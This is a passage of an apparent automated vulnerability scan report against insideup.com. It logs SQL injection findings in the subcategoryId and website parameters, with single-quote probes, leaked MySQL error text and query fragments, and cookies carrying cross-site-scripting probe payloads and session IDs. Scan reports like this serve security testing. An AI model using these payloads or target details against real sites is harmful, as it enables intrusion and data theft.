Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:01:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3e16debm5i3hlil6shq6hu8387; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.301. http://www.insideup.com/ppc/leadflow/fist00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:02:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r6o3crd1jmr760k374pgda2v60; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:02:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mo16dsaqccddk48i2eno40i3n0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.302. http://www.insideup.com/ppc/leadflow/fist00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:03:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u1vl5ojku6oidiuo4aup65apl4; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5

Request 2

